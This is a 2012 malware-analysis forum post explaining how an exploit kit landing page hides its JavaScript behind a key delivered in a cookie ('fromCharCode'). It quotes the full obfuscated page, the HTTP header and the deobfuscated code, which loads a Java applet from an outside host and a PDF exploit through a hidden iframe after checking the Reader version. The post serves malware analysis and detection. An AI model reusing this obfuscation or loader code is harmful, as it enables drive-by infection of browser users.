Malware Domain List

Malware Related => Malware Analysis => Topic started by: SysAdMini on February 24, 2012, 05:53:43 pm

Title: Exploit kit requires cookie content for deobfuscation
Post by: SysAdMini on February 24, 2012, 05:53:43 pm
Today I came across an interesting obfuscation.

I discovered the following obfuscated code. The code contains references to document.cookie
like "String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)]". That means that content
of a cookie is required for deobfuscation of the code.

Quote
<html><head>
<title></title>
</head><body><div id = '22yvOj'>53p108p45p69p107p73p33p71p115p56p124p81p53p108</div><div id = '18yvOj'>8p82p75p84p53p93p61p97p108p73p44p63p38p46p43p55p36p95p123p41p98p46p116p89p116p49p84p82p103p98p107p84p97p59p120p60p36p78p115p87p51p90p73p70p108p73p120p73p75p52p100p87p121p52p36p43p86p81p114p6</div><span id = '15yvOj'>1p58p72p35p45p96p106p115p56p124p60p122p52p122p55p115p64p61p49p52p88p93p56p83p61p109p88p55p79p109p102p44p94p63p79p105p62p34p56p32p89p116p82p71p80p46p70p108p48p120p70p115p67p108p73p44p73p111p58p108p</span><p id = '8yvOj'>p63p74p88p55p97p97p63p113p67p63p78p117p100p43p57p37p54p81p63p117p66p124p70p97p63p113p67p65p78p117p70p36p52p34p70p82p102p112p66p113p61p91p48p122p71p60p43</p><div id = '9yvOj'>p96p48p109p71p115p107p90p48p121p56p124p60p116p80p117p57p34p41p91p48p51p90p73p44p122p62p113p71p79p60p98p61p117p53p37p60p83p81p51p74p119p44p98p51p51</div><div id = '17yvOj'>p117p110p61p107p65p46p32p60p32p60p43p81p103p49p58p37p119p82p56p96p73p70p108p73p36p52p34p70p84p52p114p110p61p103p81p61p123p119p125p58p91p102p52p46p10</div><div id = '7yvOj'>11p117p70p42p101p96p69p122p32p37p32p46p56p53p75p36p88p117p45p34p93p37p101p119p96p59p75p118p113p43p53p118p111p96p48p100p42p88p109p67p32p52p83</div><p id = '3yvOj'>5p78p115p101p109p67p32p52p83p63p44p54p125p44p83p102p46p35p118p55p98p58p58p54p122p41p97p62p46p81p111p5</p><div id = '19yvOj'>0p55p35p125p40p58p70p32p52p87p63p52p88p60p77p117p100p44p81p46p59p100p102p124p52p34p59p83p114p122p71p54p52p100p38</div><span id = '1yvOj'>87p47p34p59p75p86p108p46p120p52p35p59p87p47p73p54p122p59p87p47p70p116p79p94p47p98p67p105p62p83p32p97p60p117p59p87p125p108p82p94p79p88p34p109p57p101p66p90p35p94p</span><div id = '2yvOj'>63p102p66p86p124p89p60p111p74p85p61p107p86p118p81p122p44p75p53p108p116p61p92p46p34p60p125p54p108p62p34p56p32p86p116p82p41p55p125p43p99p56p113p65p36p84p101p61p117p71p11</div><span id = '14yvOj'>82p60p34p45p84p58p38p88p55p79p108p74p73p81p59p87p108p71p42p81p54p54p79p65p117p58p111p60p93p6</span><div id = '4yvOj'>8p81p51p117p73p115p99p110p51p34p71p32p96p123p88p110p52p112p52p93p50p113p65p115p58p79p63p123p69p60p49p92p88p110p66</div><div id = '16yvOj'>55p36p110p94p44p84p90p58p120p115p60p68p48p32p70p119p55p92p62p52p90p73p70p108p73p44p73p111p58p108p49</div><span id = '5yvOj'>p114p61p92p98p58p61p111p58p110p103p72p67p111p58p79p56p44p65p111p53p83p102p46p67p48p70p100p44p120p72p115p99p110p65p33p70p91p52p85p50p58p104p60p65</span><p id = '20yvOj'>p60p48p55p97p108p73p44p63p38p99p94p44p32p70p115p111p92p63p52p63p38p84p88p58p117p65p54p77p115p82p53p108p46p70p108p55p36p57p75p56p79p61p33p56p87p54p98p81p120p7</p><div id = '11yvOj'>96p52p110p72p36p45p116p80p33p69p113p77p120p80p58p96p63p41p36p90p109p55p60p56p82p49p51p90p73p44p93p46p35p64p115p54p98p87p110p66p114p65p122</div><div id = '10yvOj'>p93p63p79p41p47p58p70p115p60p47p63p34p69p119p42p99p63p113p89p53p48p83p52p115p59p36p77p120p90p53p108p114p84p97p48p34p114p36p60p</div><span id = '21yvOj'>3p116p84p88p58p117p65p54p77p115p82p53p108p46p70p108p52p114p81p54p52p100p103p73p105p62p86p117p70p33p71p115p56p33p81p</span><p id = '6yvOj'>p52p110p66p56p68p88p37p62p82p99p94p63p83p50p82p59p35p118p59p65p89p94p69p43p63p122p114p33p77p33p1</p><p id = '13yvOj'>05p73p44p81p119p46p108p81p52p65p111p62p87p50p109p71p125p58p122p64p33p56p34p103p85p48p122p71p60p49p92p47p113p75p93p46p116p80p</p><div id = '12yvOj'>p44p124p67p115p54p82p108p116p60p122p44p116p47p53p108p45p70p108p73p114p72p124p43p98p52p123p65p46p59p98p48p124p98p54p79p1</div><div id = '0yvOj'>82p58p111p72p123p45p92p63p58p74p34p49p98p48p52p83p74p117p48p115p81p116p98p70p87p47p73p35p114p46p125p73p116p56p119p47p86p63p73p97p46p63p</div><script>function LizeDexeq(){var PosojEwix="";for (var owiDelus=32;owiDelus<127;owiDelus++){PosojEwix+=String[document.cookie.substr(2,12)](owiDelus);}return PosojEwix;}function KykIge(){var JuhYdo="";for (var owiDelus=0;owiDelus<23;owiDelus++){JuhYdo+=document.getElementById(owiDelus+'yvOj').innerHTML;}return JuhYdo.split('p');}function PakOlemen(owiDelus,QajiMev){  var ZypYcug = WidEh['e'+'v'+QajiMev]; ZypYcug(owiDelus);}function JuvUja(PosojEwix,QajiMev){if (PosojEwix-QajiMev >=0){return PosojEwix-QajiMev;}else{return 94-(QajiMev-PosojEwix);}}var WidEh;eval('WidEh='+String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)](119,105,110,100,111,119));window.onload = function(){var NefaJinu = [76,41,12,49,14,38];var TajiZune  = LizeDexeq();var PosojEwix = KykIge();   var ZixEg = 0;var QajiMev = "";for ( var owiDelus=0;owiDelus<PosojEwix.length;owiDelus++){   QajiMev+=TajiZune.charAt(JuvUja(TajiZune.indexOf(String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)](PosojEwix[owiDelus])),NefaJinu[ZixEg]));ZixEg++;if (ZixEg == NefaJinu.length){ZixEg = 0;}}  PakOlemen(QajiMev,'al');}</script></body></html>

Here is the http header containing the cookie.

Quote
HTTP/1.0 200 OK
Server: nginx/1.0.11
Date: Fri, 24 Feb 2012 13:18:00 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.9
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: a=fromCharCode
Connection: close

So "document.cookie.substr(document.cookie.search(/a=/i)+2,12)]" is actually "fromCharCode".

"String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)]"  means  "String['fromCharCode']"

This technique evades detection by antivirus and analysis tools.

We find a java and a pdf exploit in deobfuscated code .

Quote
document.write("<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");function step0(){document.write('<applet code="Photo.class" archive="http:// bablogenerator . in/bodun9.jar"><param name="p" value="vssMlgg.7.yFE6e627sF2PwegFhsPMvM-7cQQfN?Y#L:WW:WQrRpfJj?QJO?WQRWQrp?EccGMc/"></applet>');step1();}function step3(){var d=document.createElement('iframe');d.setAttribute('width',1);d.setAttribute('height',1);d.setAttribute('src','./1a61ad.pdf');document.body.appendChild(d);}   function step1(){   if ((navigator.userAgent.indexOf('Firefox')) != -1 || (navigator.userAgent.indexOf('Opera'))!= -1){step3();}   else{   var lv=Pdf1.GetVersions();    var fi=/EScript=([^,]+),/;   var fif=/AcroForm=([^,]+),/;   lvf=lv.match(fif)[1].split('.');   lv=lv.match(fi)[1].split('.');   sv=parseInt(lv[0]);   lv=parseInt(lv.join(''));   lvf=parseInt(lvf.join(''));   if (lv>=800){step3();}}} step0();